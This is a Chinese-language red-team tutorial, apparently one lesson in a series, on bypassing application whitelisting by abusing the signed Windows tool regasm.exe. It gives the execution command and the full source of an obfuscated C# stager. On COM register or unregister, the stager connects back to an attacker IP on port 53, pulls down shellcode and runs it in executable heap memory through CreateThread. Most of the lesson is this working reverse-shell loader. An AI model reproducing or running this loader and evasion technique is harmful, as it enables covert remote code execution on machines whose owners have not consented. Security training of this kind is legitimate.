第七十三课:基于白名单Regasm.exe执行payload第三季

Regasm简介:

Regasm 为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NET Assembly Registration Utility相关联。
说明:Regasm.exe所在路径没有被系统添加PATH环境变量中,因此,REGASM命令无法识别。
基于白名单Regasm.exe配置payload:
Windows 7 默认位置:
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
Copied!
攻击机:192.168.1.4 Debian 靶机:192.168.1.3 Windows 7

配置攻击机msf:

靶机执行:

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll
Copied!

附录:Micropoor.cs

注:x86 payload
1
using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;
2
3
namespace HYlDKsYF
4
5
{
6
7
public class kxKhdVzWQXolmmF : ServicedComponent {
8
9
public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); }
10
11
[ComRegisterFunction]
12
13
public static void RegisterClass ( string pNNHrTZzW )
14
15
{
16
17
ZApOAKJKY.QYJOTklTwn();
18
19
}
20
21
[ComUnregisterFunction]
22
23
public static void UnRegisterClass ( string pNNHrTZzW )
24
25
{
26
27
ZApOAKJKY.QYJOTklTwn();
28
29
}
30
31
}
32
33
public class ZApOAKJKY
34
35
{ [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);
36
37
[DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);
38
39
[DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);
40
41
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);
42
43
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy, int iJGvqiEDGLhjr) {
44
45
IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy), iJGvqiEDGLhjr);
46
47
Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
48
49
try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }
50
51
catch { return null;}
52
53
byte[] Bjpvhc = new byte[4];
54
55
MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0);
56
57
int IETFBI = BitConverter.ToInt32(Bjpvhc, 0);
58
59
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5];
60
61
int JFPJLlk = 0;
62
63
while (JFPJLlk < IETFBI)
64
65
{ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk + 5, (IETFBI ‐ JFPJLlk) < 4096 ? (IETFBI ‐ JFPJLlk) : 4096, 0);}
66
67
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);
68
69
Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4); ZKSAAFwxgSDnTW[0] = 0xBF;
70
71
return ZKSAAFwxgSDnTW;}
72
73
static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) {
74
75
if (KNCtlJWAmlqJ != null) {
76
77
UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Lengt h, 0);
78
79
UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJWAmlqJ.Length);
80
81
RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCtlJWAmlqJ.Length);
82
83
UInt32 ijifOEfllRl = 0;
84
85
IntPtr ihXuoEirmz = CreateThread(0, 0, sDPjIMhJIOAlwn, IntPtr.Zero, 0, ref ijifOEfllRl);
86
87
WaitForSingleObject(ihXuoEirmz, 0xFFFFFFFF);}}
88
89
public static void QYJOTklTwn() {
90
91
byte[] ZKSAAFwxgSDnTW = null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.1.4", 53);
92
93
TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);
94
95
} } }
Copied!
Micropoor
Last modified 2yr ago